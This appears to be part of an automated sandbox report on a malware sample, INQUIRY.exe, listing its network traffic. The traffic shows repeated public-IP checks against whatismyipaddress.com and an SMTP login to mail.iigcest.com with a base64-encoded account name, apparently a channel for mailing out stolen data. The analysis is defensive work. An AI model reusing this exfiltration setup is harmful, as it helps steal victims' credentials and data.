                                                                      Nov 18, 2020 15:03:21.421324968 CET4977680192.168.2.4104.16.154.36
                                                                      Nov 18, 2020 15:03:21.428000927 CET49777443192.168.2.4104.16.155.36
                                                                      Nov 18, 2020 15:03:21.444426060 CET44349777104.16.155.36192.168.2.4
                                                                      Nov 18, 2020 15:03:21.444983006 CET49777443192.168.2.4104.16.155.36
                                                                      Nov 18, 2020 15:03:21.519957066 CET49777443192.168.2.4104.16.155.36
                                                                      Nov 18, 2020 15:03:21.536274910 CET44349777104.16.155.36192.168.2.4
                                                                      Nov 18, 2020 15:03:21.538470984 CET44349777104.16.155.36192.168.2.4
                                                                      Nov 18, 2020 15:03:21.538897991 CET44349777104.16.155.36192.168.2.4
                                                                      Nov 18, 2020 15:03:21.538945913 CET49777443192.168.2.4104.16.155.36
                                                                      Nov 18, 2020 15:03:21.542170048 CET49777443192.168.2.4104.16.155.36
                                                                      Nov 18, 2020 15:03:21.544138908 CET49778443192.168.2.4104.16.155.36
                                                                      Nov 18, 2020 15:03:21.558535099 CET44349777104.16.155.36192.168.2.4
                                                                      Nov 18, 2020 15:03:21.560539961 CET44349778104.16.155.36192.168.2.4
                                                                      Nov 18, 2020 15:03:21.560910940 CET49778443192.168.2.4104.16.155.36
                                                                      Nov 18, 2020 15:03:21.561477900 CET49778443192.168.2.4104.16.155.36
                                                                      Nov 18, 2020 15:03:21.577825069 CET44349778104.16.155.36192.168.2.4
                                                                      Nov 18, 2020 15:03:21.578566074 CET44349778104.16.155.36192.168.2.4
                                                                      Nov 18, 2020 15:03:21.578881979 CET44349778104.16.155.36192.168.2.4
                                                                      Nov 18, 2020 15:03:21.579174995 CET49778443192.168.2.4104.16.155.36
                                                                      Nov 18, 2020 15:03:21.580313921 CET49778443192.168.2.4104.16.155.36
                                                                      Nov 18, 2020 15:03:21.596695900 CET44349778104.16.155.36192.168.2.4
                                                                      Nov 18, 2020 15:03:29.440840960 CET4977680192.168.2.4104.16.154.36
                                                                      Nov 18, 2020 15:03:33.825721025 CET4978380192.168.2.4104.16.155.36
                                                                      Nov 18, 2020 15:03:33.842268944 CET8049783104.16.155.36192.168.2.4
                                                                      Nov 18, 2020 15:03:33.842434883 CET4978380192.168.2.4104.16.155.36
                                                                      Nov 18, 2020 15:03:33.843103886 CET4978380192.168.2.4104.16.155.36
                                                                      Nov 18, 2020 15:03:33.859492064 CET8049783104.16.155.36192.168.2.4
                                                                      Nov 18, 2020 15:03:33.867271900 CET8049783104.16.155.36192.168.2.4
                                                                      Nov 18, 2020 15:03:33.919022083 CET49784443192.168.2.4104.16.155.36
                                                                      Nov 18, 2020 15:03:33.922338009 CET4978380192.168.2.4104.16.155.36
                                                                      Nov 18, 2020 15:03:33.935373068 CET44349784104.16.155.36192.168.2.4
                                                                      Nov 18, 2020 15:03:33.935470104 CET49784443192.168.2.4104.16.155.36
                                                                      Nov 18, 2020 15:03:33.994344950 CET49784443192.168.2.4104.16.155.36
                                                                      Nov 18, 2020 15:03:34.010693073 CET44349784104.16.155.36192.168.2.4
                                                                      Nov 18, 2020 15:03:34.011655092 CET44349784104.16.155.36192.168.2.4
                                                                      Nov 18, 2020 15:03:34.011869907 CET44349784104.16.155.36192.168.2.4
                                                                      Nov 18, 2020 15:03:34.012151957 CET49784443192.168.2.4104.16.155.36
                                                                      Nov 18, 2020 15:03:34.014883041 CET49784443192.168.2.4104.16.155.36
                                                                      Nov 18, 2020 15:03:34.017091990 CET49785443192.168.2.4104.16.155.36
                                                                      Nov 18, 2020 15:03:34.031169891 CET44349784104.16.155.36192.168.2.4
                                                                      Nov 18, 2020 15:03:34.033345938 CET44349785104.16.155.36192.168.2.4
                                                                      Nov 18, 2020 15:03:34.033483028 CET49785443192.168.2.4104.16.155.36
                                                                      Nov 18, 2020 15:03:34.034290075 CET49785443192.168.2.4104.16.155.36
                                                                      Nov 18, 2020 15:03:34.050524950 CET44349785104.16.155.36192.168.2.4
                                                                      Nov 18, 2020 15:03:34.051311970 CET44349785104.16.155.36192.168.2.4
                                                                      Nov 18, 2020 15:03:34.051436901 CET44349785104.16.155.36192.168.2.4
                                                                      Nov 18, 2020 15:03:34.051750898 CET49785443192.168.2.4104.16.155.36
                                                                      Nov 18, 2020 15:03:34.053292036 CET49785443192.168.2.4104.16.155.36
                                                                      Nov 18, 2020 15:03:34.069533110 CET44349785104.16.155.36192.168.2.4
                                                                      Nov 18, 2020 15:04:00.063572884 CET4978380192.168.2.4104.16.155.36
                                                                      Nov 18, 2020 15:04:00.705008984 CET4979080192.168.2.4104.16.155.36
                                                                      Nov 18, 2020 15:04:00.721420050 CET8049790104.16.155.36192.168.2.4
                                                                      Nov 18, 2020 15:04:00.721513033 CET4979080192.168.2.4104.16.155.36
                                                                      Nov 18, 2020 15:04:00.721941948 CET4979080192.168.2.4104.16.155.36
                                                                      Nov 18, 2020 15:04:00.738285065 CET8049790104.16.155.36192.168.2.4
                                                                      Nov 18, 2020 15:04:00.753989935 CET8049790104.16.155.36192.168.2.4
                                                                      Nov 18, 2020 15:04:00.792529106 CET49791443192.168.2.4104.16.155.36
                                                                      Nov 18, 2020 15:04:00.799551964 CET4979080192.168.2.4104.16.155.36
                                                                      Nov 18, 2020 15:04:00.808798075 CET44349791104.16.155.36192.168.2.4
                                                                      Nov 18, 2020 15:04:00.808916092 CET49791443192.168.2.4104.16.155.36
                                                                      Nov 18, 2020 15:04:00.814506054 CET49791443192.168.2.4104.16.155.36
                                                                      Nov 18, 2020 15:04:00.830831051 CET44349791104.16.155.36192.168.2.4
                                                                      Nov 18, 2020 15:04:00.831717014 CET44349791104.16.155.36192.168.2.4
                                                                      Nov 18, 2020 15:04:00.831876993 CET44349791104.16.155.36192.168.2.4
                                                                      Nov 18, 2020 15:04:00.831955910 CET49791443192.168.2.4104.16.155.36
                                                                      Nov 18, 2020 15:04:00.833606958 CET49791443192.168.2.4104.16.155.36
                                                                      Nov 18, 2020 15:04:00.834084988 CET49792443192.168.2.4104.16.155.36
                                                                      Nov 18, 2020 15:04:00.849889994 CET44349791104.16.155.36192.168.2.4
                                                                      Nov 18, 2020 15:04:00.850408077 CET44349792104.16.155.36192.168.2.4
                                                                      Nov 18, 2020 15:04:00.850503922 CET49792443192.168.2.4104.16.155.36
                                                                      Nov 18, 2020 15:04:00.850949049 CET49792443192.168.2.4104.16.155.36
                                                                      Nov 18, 2020 15:04:00.867291927 CET44349792104.16.155.36192.168.2.4
                                                                      Nov 18, 2020 15:04:00.867737055 CET44349792104.16.155.36192.168.2.4
                                                                      Nov 18, 2020 15:04:00.867901087 CET44349792104.16.155.36192.168.2.4
                                                                      Nov 18, 2020 15:04:00.867955923 CET49792443192.168.2.4104.16.155.36
                                                                      Nov 18, 2020 15:04:00.868451118 CET49792443192.168.2.4104.16.155.36
                                                                      Nov 18, 2020 15:04:00.884862900 CET44349792104.16.155.36192.168.2.4

                                                                      UDP Packets

                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Nov 18, 2020 15:01:43.623750925 CET6454953192.168.2.48.8.8.8
                                                                      Nov 18, 2020 15:01:43.650897980 CET53645498.8.8.8192.168.2.4
                                                                      Nov 18, 2020 15:01:45.449043989 CET6315353192.168.2.48.8.8.8
                                                                      Nov 18, 2020 15:01:45.475955009 CET53631538.8.8.8192.168.2.4
                                                                      Nov 18, 2020 15:01:46.248142004 CET5299153192.168.2.48.8.8.8
                                                                      Nov 18, 2020 15:01:46.275309086 CET53529918.8.8.8192.168.2.4
                                                                      Nov 18, 2020 15:01:47.094983101 CET5370053192.168.2.48.8.8.8
                                                                      Nov 18, 2020 15:01:47.122129917 CET53537008.8.8.8192.168.2.4
                                                                      Nov 18, 2020 15:01:47.915492058 CET5172653192.168.2.48.8.8.8
                                                                      Nov 18, 2020 15:01:47.943371058 CET53517268.8.8.8192.168.2.4
                                                                      Nov 18, 2020 15:01:48.590341091 CET5679453192.168.2.48.8.8.8
                                                                      Nov 18, 2020 15:01:48.617573977 CET53567948.8.8.8192.168.2.4
                                                                      Nov 18, 2020 15:01:49.659903049 CET5653453192.168.2.48.8.8.8
                                                                      Nov 18, 2020 15:01:49.687086105 CET53565348.8.8.8192.168.2.4
                                                                      Nov 18, 2020 15:01:50.457806110 CET5662753192.168.2.48.8.8.8
                                                                      Nov 18, 2020 15:01:50.495663881 CET53566278.8.8.8192.168.2.4
                                                                      Nov 18, 2020 15:01:54.680612087 CET5662153192.168.2.48.8.8.8
                                                                      Nov 18, 2020 15:01:54.707959890 CET53566218.8.8.8192.168.2.4
                                                                      Nov 18, 2020 15:01:55.514782906 CET6311653192.168.2.48.8.8.8
                                                                      Nov 18, 2020 15:01:55.541924000 CET53631168.8.8.8192.168.2.4
                                                                      Nov 18, 2020 15:01:56.319547892 CET6407853192.168.2.48.8.8.8
                                                                      Nov 18, 2020 15:01:56.346719980 CET53640788.8.8.8192.168.2.4
                                                                      Nov 18, 2020 15:01:57.273447990 CET6480153192.168.2.48.8.8.8
                                                                      Nov 18, 2020 15:01:57.300653934 CET53648018.8.8.8192.168.2.4
                                                                      Nov 18, 2020 15:01:58.292248964 CET6172153192.168.2.48.8.8.8
                                                                      Nov 18, 2020 15:01:58.319410086 CET53617218.8.8.8192.168.2.4
                                                                      Nov 18, 2020 15:01:58.704564095 CET5125553192.168.2.48.8.8.8
                                                                      Nov 18, 2020 15:01:58.741070986 CET53512558.8.8.8192.168.2.4
                                                                      Nov 18, 2020 15:01:58.971637011 CET6152253192.168.2.48.8.8.8
                                                                      Nov 18, 2020 15:01:59.006939888 CET53615228.8.8.8192.168.2.4
                                                                      Nov 18, 2020 15:01:59.079847097 CET5233753192.168.2.48.8.8.8
                                                                      Nov 18, 2020 15:01:59.106956959 CET53523378.8.8.8192.168.2.4
                                                                      Nov 18, 2020 15:02:02.765192986 CET5504653192.168.2.48.8.8.8
                                                                      Nov 18, 2020 15:02:02.792345047 CET53550468.8.8.8192.168.2.4
                                                                      Nov 18, 2020 15:02:11.437201977 CET4961253192.168.2.48.8.8.8
                                                                      Nov 18, 2020 15:02:11.464301109 CET53496128.8.8.8192.168.2.4
                                                                      Nov 18, 2020 15:02:22.060935974 CET4928553192.168.2.48.8.8.8
                                                                      Nov 18, 2020 15:02:22.088042021 CET53492858.8.8.8192.168.2.4
                                                                      Nov 18, 2020 15:02:23.770134926 CET5060153192.168.2.48.8.8.8
                                                                      Nov 18, 2020 15:02:23.815956116 CET53506018.8.8.8192.168.2.4
                                                                      Nov 18, 2020 15:02:32.777748108 CET6087553192.168.2.48.8.8.8
                                                                      Nov 18, 2020 15:02:32.804969072 CET53608758.8.8.8192.168.2.4
                                                                      Nov 18, 2020 15:02:35.306493044 CET5644853192.168.2.48.8.8.8
                                                                      Nov 18, 2020 15:02:35.342278957 CET53564488.8.8.8192.168.2.4
                                                                      Nov 18, 2020 15:02:35.996299028 CET5917253192.168.2.48.8.8.8
                                                                      Nov 18, 2020 15:02:36.031609058 CET53591728.8.8.8192.168.2.4
                                                                      Nov 18, 2020 15:02:36.529362917 CET6242053192.168.2.48.8.8.8
                                                                      Nov 18, 2020 15:02:36.565490007 CET53624208.8.8.8192.168.2.4
                                                                      Nov 18, 2020 15:02:36.900733948 CET6057953192.168.2.48.8.8.8
                                                                      Nov 18, 2020 15:02:36.960184097 CET53605798.8.8.8192.168.2.4
                                                                      Nov 18, 2020 15:02:37.449456930 CET5018353192.168.2.48.8.8.8
                                                                      Nov 18, 2020 15:02:37.485517025 CET53501838.8.8.8192.168.2.4
                                                                      Nov 18, 2020 15:02:37.910711050 CET6153153192.168.2.48.8.8.8
                                                                      Nov 18, 2020 15:02:37.937813044 CET53615318.8.8.8192.168.2.4
                                                                      Nov 18, 2020 15:02:38.128568888 CET4922853192.168.2.48.8.8.8
                                                                      Nov 18, 2020 15:02:38.164376020 CET53492288.8.8.8192.168.2.4
                                                                      Nov 18, 2020 15:02:38.443804026 CET5979453192.168.2.48.8.8.8
                                                                      Nov 18, 2020 15:02:38.471159935 CET53597948.8.8.8192.168.2.4
                                                                      Nov 18, 2020 15:02:38.472012043 CET5591653192.168.2.48.8.8.8
                                                                      Nov 18, 2020 15:02:38.507505894 CET53559168.8.8.8192.168.2.4
                                                                      Nov 18, 2020 15:02:38.556760073 CET5275253192.168.2.48.8.8.8
                                                                      Nov 18, 2020 15:02:38.592199087 CET53527528.8.8.8192.168.2.4
                                                                      Nov 18, 2020 15:02:38.655498981 CET6054253192.168.2.48.8.8.8
                                                                      Nov 18, 2020 15:02:38.690794945 CET53605428.8.8.8192.168.2.4
                                                                      Nov 18, 2020 15:02:39.171142101 CET6068953192.168.2.48.8.8.8
                                                                      Nov 18, 2020 15:02:39.207019091 CET53606898.8.8.8192.168.2.4
                                                                      Nov 18, 2020 15:02:39.929310083 CET6420653192.168.2.48.8.8.8
                                                                      Nov 18, 2020 15:02:39.956566095 CET53642068.8.8.8192.168.2.4
                                                                      Nov 18, 2020 15:02:41.034682989 CET5090453192.168.2.48.8.8.8
                                                                      Nov 18, 2020 15:02:41.072463989 CET53509048.8.8.8192.168.2.4
                                                                      Nov 18, 2020 15:02:43.444211006 CET5752553192.168.2.48.8.8.8
                                                                      Nov 18, 2020 15:02:43.471467018 CET53575258.8.8.8192.168.2.4
                                                                      Nov 18, 2020 15:02:55.619406939 CET5381453192.168.2.48.8.8.8
                                                                      Nov 18, 2020 15:02:55.656312943 CET53538148.8.8.8192.168.2.4
                                                                      Nov 18, 2020 15:03:04.388042927 CET5341853192.168.2.48.8.8.8
                                                                      Nov 18, 2020 15:03:04.415371895 CET53534188.8.8.8192.168.2.4
                                                                      Nov 18, 2020 15:03:05.854183912 CET6283353192.168.2.48.8.8.8
                                                                      Nov 18, 2020 15:03:05.904856920 CET53628338.8.8.8192.168.2.4
                                                                      Nov 18, 2020 15:03:20.956906080 CET5926053192.168.2.48.8.8.8
                                                                      Nov 18, 2020 15:03:20.992511988 CET53592608.8.8.8192.168.2.4
                                                                      Nov 18, 2020 15:03:21.287211895 CET4994453192.168.2.48.8.8.8
                                                                      Nov 18, 2020 15:03:21.314351082 CET53499448.8.8.8192.168.2.4
                                                                      Nov 18, 2020 15:03:21.386476994 CET6330053192.168.2.48.8.8.8
                                                                      Nov 18, 2020 15:03:21.424304962 CET53633008.8.8.8192.168.2.4
                                                                      Nov 18, 2020 15:03:24.213391066 CET6144953192.168.2.48.8.8.8
                                                                      Nov 18, 2020 15:03:24.240730047 CET53614498.8.8.8192.168.2.4
                                                                      Nov 18, 2020 15:03:24.378654003 CET5127553192.168.2.48.8.8.8
                                                                      Nov 18, 2020 15:03:24.414350033 CET53512758.8.8.8192.168.2.4
                                                                      Nov 18, 2020 15:03:26.271187067 CET6349253192.168.2.48.8.8.8
                                                                      Nov 18, 2020 15:03:26.298304081 CET53634928.8.8.8192.168.2.4
                                                                      Nov 18, 2020 15:03:33.447617054 CET5894553192.168.2.48.8.8.8
                                                                      Nov 18, 2020 15:03:33.483230114 CET53589458.8.8.8192.168.2.4
                                                                      Nov 18, 2020 15:03:33.766551018 CET6077953192.168.2.48.8.8.8
                                                                      Nov 18, 2020 15:03:33.802285910 CET53607798.8.8.8192.168.2.4
                                                                      Nov 18, 2020 15:03:33.881725073 CET6401453192.168.2.48.8.8.8
                                                                      Nov 18, 2020 15:03:33.917220116 CET53640148.8.8.8192.168.2.4
                                                                      Nov 18, 2020 15:03:38.988058090 CET5709153192.168.2.48.8.8.8
                                                                      Nov 18, 2020 15:03:39.015259027 CET53570918.8.8.8192.168.2.4
                                                                      Nov 18, 2020 15:03:46.905772924 CET5590453192.168.2.48.8.8.8
                                                                      Nov 18, 2020 15:03:46.933022976 CET53559048.8.8.8192.168.2.4
                                                                      Nov 18, 2020 15:03:56.111162901 CET5210953192.168.2.48.8.8.8
                                                                      Nov 18, 2020 15:03:56.138288021 CET53521098.8.8.8192.168.2.4
                                                                      Nov 18, 2020 15:04:00.602796078 CET5445053192.168.2.48.8.8.8
                                                                      Nov 18, 2020 15:04:00.638335943 CET53544508.8.8.8192.168.2.4
                                                                      Nov 18, 2020 15:04:00.673490047 CET4937453192.168.2.48.8.8.8
                                                                      Nov 18, 2020 15:04:00.700529099 CET53493748.8.8.8192.168.2.4
                                                                      Nov 18, 2020 15:04:00.756617069 CET5043653192.168.2.48.8.8.8
                                                                      Nov 18, 2020 15:04:00.791821003 CET53504368.8.8.8192.168.2.4

                                                                      DNS Queries

                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                      Nov 18, 2020 15:01:58.704564095 CET192.168.2.48.8.8.80x7fd8Standard query (0)121.205.6.0.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                                                      Nov 18, 2020 15:01:58.971637011 CET192.168.2.48.8.8.80x27c4Standard query (0)whatismyipaddress.comA (IP address)IN (0x0001)
                                                                      Nov 18, 2020 15:01:59.079847097 CET192.168.2.48.8.8.80x7cb6Standard query (0)whatismyipaddress.comA (IP address)IN (0x0001)
                                                                      Nov 18, 2020 15:02:23.770134926 CET192.168.2.48.8.8.80xb5a3Standard query (0)mail.iigcest.comA (IP address)IN (0x0001)
                                                                      Nov 18, 2020 15:02:38.128568888 CET192.168.2.48.8.8.80x8bd0Standard query (0)121.205.6.0.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                                                      Nov 18, 2020 15:02:38.443804026 CET192.168.2.48.8.8.80x9673Standard query (0)whatismyipaddress.comA (IP address)IN (0x0001)
                                                                      Nov 18, 2020 15:02:38.556760073 CET192.168.2.48.8.8.80x19cStandard query (0)whatismyipaddress.comA (IP address)IN (0x0001)
                                                                      Nov 18, 2020 15:03:05.854183912 CET192.168.2.48.8.8.80x697aStandard query (0)mail.iigcest.comA (IP address)IN (0x0001)
                                                                      Nov 18, 2020 15:03:20.956906080 CET192.168.2.48.8.8.80xa2aaStandard query (0)121.205.6.0.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                                                      Nov 18, 2020 15:03:21.287211895 CET192.168.2.48.8.8.80x557aStandard query (0)whatismyipaddress.comA (IP address)IN (0x0001)
                                                                      Nov 18, 2020 15:03:21.386476994 CET192.168.2.48.8.8.80x5ae3Standard query (0)whatismyipaddress.comA (IP address)IN (0x0001)
                                                                      Nov 18, 2020 15:03:33.447617054 CET192.168.2.48.8.8.80x53b6Standard query (0)121.205.6.0.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                                                      Nov 18, 2020 15:03:33.766551018 CET192.168.2.48.8.8.80x5dfbStandard query (0)whatismyipaddress.comA (IP address)IN (0x0001)
                                                                      Nov 18, 2020 15:03:33.881725073 CET192.168.2.48.8.8.80x5d23Standard query (0)whatismyipaddress.comA (IP address)IN (0x0001)
                                                                      Nov 18, 2020 15:04:00.602796078 CET192.168.2.48.8.8.80x70c7Standard query (0)121.205.6.0.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                                                      Nov 18, 2020 15:04:00.673490047 CET192.168.2.48.8.8.80x279fStandard query (0)whatismyipaddress.comA (IP address)IN (0x0001)
                                                                      Nov 18, 2020 15:04:00.756617069 CET192.168.2.48.8.8.80x506Standard query (0)whatismyipaddress.comA (IP address)IN (0x0001)

                                                                      DNS Answers

                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                      Nov 18, 2020 15:01:58.741070986 CET8.8.8.8192.168.2.40x7fd8Name error (3)121.205.6.0.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)
                                                                      Nov 18, 2020 15:01:59.006939888 CET8.8.8.8192.168.2.40x27c4No error (0)whatismyipaddress.com104.16.154.36A (IP address)IN (0x0001)
                                                                      Nov 18, 2020 15:01:59.006939888 CET8.8.8.8192.168.2.40x27c4No error (0)whatismyipaddress.com104.16.155.36A (IP address)IN (0x0001)
                                                                      Nov 18, 2020 15:01:59.106956959 CET8.8.8.8192.168.2.40x7cb6No error (0)whatismyipaddress.com104.16.154.36A (IP address)IN (0x0001)
                                                                      Nov 18, 2020 15:01:59.106956959 CET8.8.8.8192.168.2.40x7cb6No error (0)whatismyipaddress.com104.16.155.36A (IP address)IN (0x0001)
                                                                      Nov 18, 2020 15:02:23.815956116 CET8.8.8.8192.168.2.40xb5a3No error (0)mail.iigcest.com166.62.27.57A (IP address)IN (0x0001)
                                                                      Nov 18, 2020 15:02:38.164376020 CET8.8.8.8192.168.2.40x8bd0Name error (3)121.205.6.0.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)
                                                                      Nov 18, 2020 15:02:38.471159935 CET8.8.8.8192.168.2.40x9673No error (0)whatismyipaddress.com104.16.154.36A (IP address)IN (0x0001)
                                                                      Nov 18, 2020 15:02:38.471159935 CET8.8.8.8192.168.2.40x9673No error (0)whatismyipaddress.com104.16.155.36A (IP address)IN (0x0001)
                                                                      Nov 18, 2020 15:02:38.592199087 CET8.8.8.8192.168.2.40x19cNo error (0)whatismyipaddress.com104.16.154.36A (IP address)IN (0x0001)
                                                                      Nov 18, 2020 15:02:38.592199087 CET8.8.8.8192.168.2.40x19cNo error (0)whatismyipaddress.com104.16.155.36A (IP address)IN (0x0001)
                                                                      Nov 18, 2020 15:03:05.904856920 CET8.8.8.8192.168.2.40x697aNo error (0)mail.iigcest.com166.62.27.57A (IP address)IN (0x0001)
                                                                      Nov 18, 2020 15:03:20.992511988 CET8.8.8.8192.168.2.40xa2aaName error (3)121.205.6.0.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)
                                                                      Nov 18, 2020 15:03:21.314351082 CET8.8.8.8192.168.2.40x557aNo error (0)whatismyipaddress.com104.16.154.36A (IP address)IN (0x0001)
                                                                      Nov 18, 2020 15:03:21.314351082 CET8.8.8.8192.168.2.40x557aNo error (0)whatismyipaddress.com104.16.155.36A (IP address)IN (0x0001)
                                                                      Nov 18, 2020 15:03:21.424304962 CET8.8.8.8192.168.2.40x5ae3No error (0)whatismyipaddress.com104.16.155.36A (IP address)IN (0x0001)
                                                                      Nov 18, 2020 15:03:21.424304962 CET8.8.8.8192.168.2.40x5ae3No error (0)whatismyipaddress.com104.16.154.36A (IP address)IN (0x0001)
                                                                      Nov 18, 2020 15:03:33.483230114 CET8.8.8.8192.168.2.40x53b6Name error (3)121.205.6.0.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)
                                                                      Nov 18, 2020 15:03:33.802285910 CET8.8.8.8192.168.2.40x5dfbNo error (0)whatismyipaddress.com104.16.155.36A (IP address)IN (0x0001)
                                                                      Nov 18, 2020 15:03:33.802285910 CET8.8.8.8192.168.2.40x5dfbNo error (0)whatismyipaddress.com104.16.154.36A (IP address)IN (0x0001)
                                                                      Nov 18, 2020 15:03:33.917220116 CET8.8.8.8192.168.2.40x5d23No error (0)whatismyipaddress.com104.16.155.36A (IP address)IN (0x0001)
                                                                      Nov 18, 2020 15:03:33.917220116 CET8.8.8.8192.168.2.40x5d23No error (0)whatismyipaddress.com104.16.154.36A (IP address)IN (0x0001)
                                                                      Nov 18, 2020 15:04:00.638335943 CET8.8.8.8192.168.2.40x70c7Name error (3)121.205.6.0.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)
                                                                      Nov 18, 2020 15:04:00.700529099 CET8.8.8.8192.168.2.40x279fNo error (0)whatismyipaddress.com104.16.155.36A (IP address)IN (0x0001)
                                                                      Nov 18, 2020 15:04:00.700529099 CET8.8.8.8192.168.2.40x279fNo error (0)whatismyipaddress.com104.16.154.36A (IP address)IN (0x0001)
                                                                      Nov 18, 2020 15:04:00.791821003 CET8.8.8.8192.168.2.40x506No error (0)whatismyipaddress.com104.16.155.36A (IP address)IN (0x0001)
                                                                      Nov 18, 2020 15:04:00.791821003 CET8.8.8.8192.168.2.40x506No error (0)whatismyipaddress.com104.16.154.36A (IP address)IN (0x0001)

                                                                      HTTP Request Dependency Graph

                                                                      • whatismyipaddress.com

                                                                      HTTP Packets

                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      0192.168.2.449743104.16.154.3680C:\Users\user\Desktop\INQUIRY.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Nov 18, 2020 15:01:59.048484087 CET348OUTGET / HTTP/1.1
                                                                      Host: whatismyipaddress.com
                                                                      Connection: Keep-Alive
                                                                      Nov 18, 2020 15:01:59.071091890 CET349INHTTP/1.1 301 Moved Permanently
                                                                      Date: Wed, 18 Nov 2020 14:01:59 GMT
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Cache-Control: max-age=3600
                                                                      Expires: Wed, 18 Nov 2020 15:01:59 GMT
                                                                      Location: https://whatismyipaddress.com/
                                                                      cf-request-id: 067d42940f0000c2810dbe2000000001
                                                                      Server: cloudflare
                                                                      CF-RAY: 5f423a0018cdc281-FRA
                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      1192.168.2.449759104.16.154.3680C:\Users\user\Desktop\INQUIRY.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Nov 18, 2020 15:02:38.523021936 CET844OUTGET / HTTP/1.1
                                                                      Host: whatismyipaddress.com
                                                                      Connection: Keep-Alive
                                                                      Nov 18, 2020 15:02:38.549550056 CET844INHTTP/1.1 301 Moved Permanently
                                                                      Date: Wed, 18 Nov 2020 14:02:38 GMT
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Cache-Control: max-age=3600
                                                                      Expires: Wed, 18 Nov 2020 15:02:38 GMT
                                                                      Location: https://whatismyipaddress.com/
                                                                      cf-request-id: 067d432e42000063776eb34000000001
                                                                      Server: cloudflare
                                                                      CF-RAY: 5f423af6cb926377-FRA
                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      2192.168.2.449776104.16.154.3680C:\Users\user\Desktop\INQUIRY.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Nov 18, 2020 15:03:21.354469061 CET5549OUTGET / HTTP/1.1
                                                                      Host: whatismyipaddress.com
                                                                      Connection: Keep-Alive
                                                                      Nov 18, 2020 15:03:21.376317978 CET5550INHTTP/1.1 301 Moved Permanently
                                                                      Date: Wed, 18 Nov 2020 14:03:21 GMT
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Cache-Control: max-age=3600
                                                                      Expires: Wed, 18 Nov 2020 15:03:21 GMT
                                                                      Location: https://whatismyipaddress.com/
                                                                      cf-request-id: 067d43d59000002c2ed824b000000001
                                                                      Server: cloudflare
                                                                      CF-RAY: 5f423c0288692c2e-FRA
                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      3192.168.2.449783104.16.155.3680C:\Users\user\Desktop\INQUIRY.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Nov 18, 2020 15:03:33.843103886 CET5584OUTGET / HTTP/1.1
                                                                      Host: whatismyipaddress.com
                                                                      Connection: Keep-Alive
                                                                      Nov 18, 2020 15:03:33.867271900 CET5584INHTTP/1.1 301 Moved Permanently
                                                                      Date: Wed, 18 Nov 2020 14:03:33 GMT
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Cache-Control: max-age=3600
                                                                      Expires: Wed, 18 Nov 2020 15:03:33 GMT
                                                                      Location: https://whatismyipaddress.com/
                                                                      cf-request-id: 067d44065900002b95012f5000000001
                                                                      Server: cloudflare
                                                                      CF-RAY: 5f423c508af42b95-FRA
                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      4192.168.2.449790104.16.155.3680C:\Users\user\Desktop\INQUIRY.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Nov 18, 2020 15:04:00.721941948 CET5624OUTGET / HTTP/1.1
                                                                      Host: whatismyipaddress.com
                                                                      Connection: Keep-Alive
                                                                      Nov 18, 2020 15:04:00.753989935 CET5624INHTTP/1.1 301 Moved Permanently
                                                                      Date: Wed, 18 Nov 2020 14:04:00 GMT
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Cache-Control: max-age=3600
                                                                      Expires: Wed, 18 Nov 2020 15:04:00 GMT
                                                                      Location: https://whatismyipaddress.com/
                                                                      cf-request-id: 067d446f5c0000d6bda83ec000000001
                                                                      Server: cloudflare
                                                                      CF-RAY: 5f423cf88d18d6bd-FRA
                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      SMTP Packets

                                                                      TimestampSource PortDest PortSource IPDest IPCommands
                                                                      Nov 18, 2020 15:02:24.647198915 CET58749750166.62.27.57192.168.2.4220-sg2plcpnl0157.prod.sin2.secureserver.net ESMTP Exim 4.93 #2 Wed, 18 Nov 2020 07:02:24 -0700
                                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                                      220 and/or bulk e-mail.
                                                                      Nov 18, 2020 15:02:24.825001001 CET49750587192.168.2.4166.62.27.57EHLO 445817
                                                                      Nov 18, 2020 15:02:25.106144905 CET58749750166.62.27.57192.168.2.4250-sg2plcpnl0157.prod.sin2.secureserver.net Hello 445817 [84.17.52.40]
                                                                      250-SIZE 52428800
                                                                      250-8BITMIME
                                                                      250-PIPELINING
                                                                      250-AUTH PLAIN LOGIN
                                                                      250-CHUNKING
                                                                      250-STARTTLS
                                                                      250-SMTPUTF8
                                                                      250 HELP
                                                                      Nov 18, 2020 15:02:25.106544971 CET49750587192.168.2.4166.62.27.57AUTH login YW5zYWZAaWlnY2VzdC5jb20=
                                                                      Nov 18, 2020 15:02:25.388585091 CET58749750166.62.27.57192.168.2.4334 UGFzc3dvcmQ6
